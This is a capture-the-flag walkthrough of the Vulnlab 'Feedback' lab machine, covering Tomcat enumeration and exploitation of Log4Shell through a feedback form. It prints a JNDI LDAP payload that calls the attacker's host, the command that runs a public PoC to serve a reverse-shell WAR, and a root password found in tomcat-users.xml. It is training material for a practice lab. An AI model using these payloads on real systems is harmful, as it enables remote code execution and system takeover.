Vulnlab - Feedback

Vulnlab – Feedback

In this walk through, we will be going through the Feedback room from Vulnlab. This room is rated as Easy on the platform and it consist of exploitation of Log4shell vulnerability to get initial access on the target. For privilege escalation, used the admin password found in tomcat-users.xml file to get root. So, let’s get started without any delay.

Feedback

Machine Info:

TitleFeedback
IPaddress10.10.64.26
DifficultyEasy
OSLinux
DescriptionFeedback is a Easy Linux machine that requires exploitation of Log4shell vulnerability to get initial access on the target. For privilege escalation, used the admin password found in tomcat-users.xml file to get root.

Enumeration:

  • I started off with a regular nmap scan along with all TCP port scan. Found 2 ports opened – 22 (SSH) and 8080 (HTTP).

$ sudo nmap -sV -sC 10.10.64.26

Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-19 13:23 IST

Nmap scan report for 10.10.98.127
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:bc:57:c0:02:9a:16:06:39:94:4b:8e:c5:4f:52:70 (RSA)
|   256 ac:ce:f2:15:29:0e:e3:5d:d0:ec:8d:30:d0:37:34:9a (ECDSA)
|_  256 15:bb:6e:86:0c:50:16:25:11:45:1e:78:a4:ab:b9:8e (ED25519)
53/tcp   filtered domain
8080/tcp open     http    Apache Tomcat 9.0.56
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.56
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.71 seconds

sudo nmap -p- -T4 10.10.98.127

PORT     STATE    SERVICE
22/tcp   open     ssh
53/tcp   filtered domain
8080/tcp open     http-proxy

Nmap done: 1 IP address (1 host up) scanned in 456.77 seconds

PORT 8080

  • The webserver is running Apache Tomcat 9.0.56.

Apache Tomcat 9.0.56

  • Fired gobuster on the target to reveal some juicy endpoints. Found a bunch of them but couldn’t access any.

$ gobuster dir -u http://10.10.64.26:8080/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.98.127:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/04/19 13:26:28 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
/feedback             (Status: 302) [Size: 0] [--> /feedback/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/[                    (Status: 400) [Size: 762]               
/plain]               (Status: 400) [Size: 762]               
/]                    (Status: 400) [Size: 762]               
/quote]               (Status: 400) [Size: 762]               
                                                              
===============================================================
2024/04/19 13:32:35 Finished
===============================================================

Directory – /manager

  • Access is Denied on this page. Cannot perform a file upload attack with .war files.

Directory - /manager

Directory – /feedback

  • The Feedback directory consist of a feedback form type page. I entered some Test text in there and it throws me a confirmation that my request has been logged. Looking carefully at the URL. It seems like it is using logfeedback.action parameter along with a Jsession ID, this indicate it might be a Java application running.

Directory - /feedback

Thank you Test!

  • I tinkered around the application and when passed with a special symbol like “{“, it throws a java error. We can test it for Log4Shell vulnerability, if that confirms we can leverage that for a RCE.

Bad request

  • I used the below JNDI encoded payload with my IP address and received a connection at netcat listener.

 ${jndi:ldap://10.8.2.6:1389/a}

http://10.10.64.26:8080/feedback/logfeedback.action;jsessionid=DBC67AF53B7A0A2D7B088D1719DE1580?name=%24{jndi%3Aldap%3A%2F%2F10.8.2.6%3A1389%2Fa}

got a connection

Exploitation:

  • Next, in order to receive a full fledge RCE on the target, i used the below exploit POC by kozmer. The exploit uses Java “jdk1.8.0_20” that we can download from the given Oracle page.

Exploit – https://github.com/kozmer/log4j-shell-poc

JDK Download – https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

  • Perform the required setup for the exploit.

# Download exploit on attack machine.

git clone https://github.com/kozmer/log4j-shell-poc

# Extract and Setup Java JDK for the exploit.

tar -xf jdk-8u202-linux-x64.tar.gz

./jdk1.8.0_202/bin/java -version

java version "1.8.0_202"
Java(TM) SE Runtime Environment (build 1.8.0_202-b08)
Java HotSpot(TM) 64-Bit Server VM (build 25.202-b08, mixed mode)

  • Make changes to the poc.py script.

Log4j nexploit

  • Now we will run the exploit with our local IP, webport where the payload will be server and the listening port of our netcat listener. The exploit will then generate the JNDI payload in the “Send me” section. Encode the payload using a URL encoder.

python3 poc.py --userip 10.8.2.6 --webport 8000 --lport 9001

firing the exploit

  • Paste the payload into the vulnerable field on the application. The payload will connect to our listening LDAP server and then download the reverse shell WAR file on the target executing it to give us a connection at our netcat listener.

Thank You

got initial access

Privilege Escalation:

  • Downloaded and executed Linpeas on the target and it reveals a potential admin password in tomcat-users.xml file.

tomvat-users.xml

  • Tried the password on the root user and surprisingly got in.

su root
H2RR3rGDrbAnPxWa

got root

Also Read: Vulnlab – Breach

Conclusion:

Conclusion

So that was “Feedback” for you. We started off with a regular nmap scan and found 2 ports opened – 22 (SSH) and 8080 (HTTP). Enumerated the webserver on port 8080 and fired gobuster on it which reveals the /feedback directory. Tinkered around and got an error which indicates that the webserver is vulnerable to Log4shell vulnerability. Exploited the same and got initial access on the target. For privilege escalation, used the admin password found in tomcat-users.xml file to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top